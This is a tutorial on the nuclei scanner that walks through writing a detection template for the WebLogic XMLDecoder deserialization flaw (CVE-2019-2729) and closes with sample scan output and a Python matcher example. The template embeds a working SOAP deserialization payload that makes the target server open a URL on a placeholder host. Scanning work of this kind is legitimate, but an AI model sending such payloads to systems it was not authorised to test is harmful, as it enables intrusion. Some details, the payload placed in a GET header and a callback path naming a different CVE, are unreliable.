Repo : https://github.com/projectdiscovery/nuclei
Get the binary or compile the source
Download templates :
git clone https://github.com/projectdiscovery/nuclei-templates.git
Nuclei works from "signatures" (templates, in the spirit of Yara rules) for services exposed over HTTP/HTTPS.
It is easy to add your own "rules" (templates) to look for other vulnerabilities, which gives you an additional, lightweight vulnerability scanner. It belongs to a new family of scanners that rely on the same technique, although not all of them use YAML.
Note that it targets low-hanging fruit.
Adding a template for WebLogic:
1. Analyze how a previous, similar vulnerability was detected (an XML payload sent via GET).
2. Create a template such as this one:
cat nuclei-templates/weblogic.yaml
id: CVE-2019-2729
info:
  name: WebLogic Deserialization
  author: wcu35745
  severity: high
  #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729
requests:
  - method: GET
    path:
      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"
    headers:
      Content-Type: text/xml
      # quoted so the XML is read as one YAML string
      SOAPAction: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
    # require BOTH matchers; without this nuclei ORs them and any 200 response would match
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"
        part: body
3. The words to match come from the response to the request carrying the XML SOAP envelope.
4. Put the URLs to scan in a text file (http:// or https://dns_name_or_IP), or use the -t parameter for a single target.
5. If a target is found vulnerable, output such as the following will appear:
./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]
[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType
There is no other indication: for a target that is not vulnerable, the [CVE-2019-2729] line above is simply absent.
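To see exactly what the two matchers decide, here is an added Python example (not part of this post or of nuclei) that re-implements the status and word matcher logic over two constructed responses, once with nuclei's default OR combination and once with `matchers-condition: and`; the template dict mirrors weblogic.yaml and the response bodies are made up.

```python
# Minimal re-implementation of nuclei's status/word matcher evaluation.
# Added example, not nuclei's own code; the template dict mirrors the
# weblogic.yaml above and the two responses are constructed samples.
from typing import Any, Dict, List

# Mirror of the request/matcher part of the template (constructed copy).
TEMPLATE = {
    "path": ["{{BaseURL}}/wls-wsat/CoordinatorPortType"],
    "matchers": [
        {"type": "status", "status": [200]},
        {"type": "word", "part": "body",
         "words": ["weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"]},
    ],
}

def expand_paths(template: Dict[str, Any], base_url: str) -> List[str]:
    """Substitute {{BaseURL}} into every path entry, as nuclei does."""
    return [p.replace("{{BaseURL}}", base_url.rstrip("/")) for p in template["path"]]

def match_one(matcher: Dict[str, Any], status: int, body: str) -> bool:
    """Evaluate a single matcher against an HTTP response."""
    if matcher["type"] == "status":
        return status in matcher["status"]
    if matcher["type"] == "word":
        haystack = body if matcher.get("part", "body") == "body" else ""
        # a word matcher is satisfied by any one of its words
        return any(w in haystack for w in matcher["words"])
    raise ValueError(f"unsupported matcher type {matcher['type']!r}")

def template_matches(template: Dict[str, Any], status: int, body: str,
                     condition: str = "or") -> bool:
    """Combine matcher results; nuclei ORs them unless matchers-condition: and is set."""
    results = [match_one(m, status, body) for m in template["matchers"]]
    return all(results) if condition == "and" else any(results)

# Constructed sample responses: a WebLogic endpoint page and a generic 200 page.
VULN_BODY = ("<html>... weblogic.wsee.wstx.wsat.v10.endpoint."
             "CoordinatorPortTypePortImpl ...</html>")
GENERIC_BODY = "<html><body>Welcome</body></html>"

if __name__ == "__main__":
    print(expand_paths(TEMPLATE, "https://192.0.2.10"))
    for name, body in (("weblogic", VULN_BODY), ("generic", GENERIC_BODY)):
        print(name, "or:", template_matches(TEMPLATE, 200, body),
              "and:", template_matches(TEMPLATE, 200, body, "and"))
```

The generic page matches under OR because its status alone satisfies one matcher, which is the false-positive the AND condition removes.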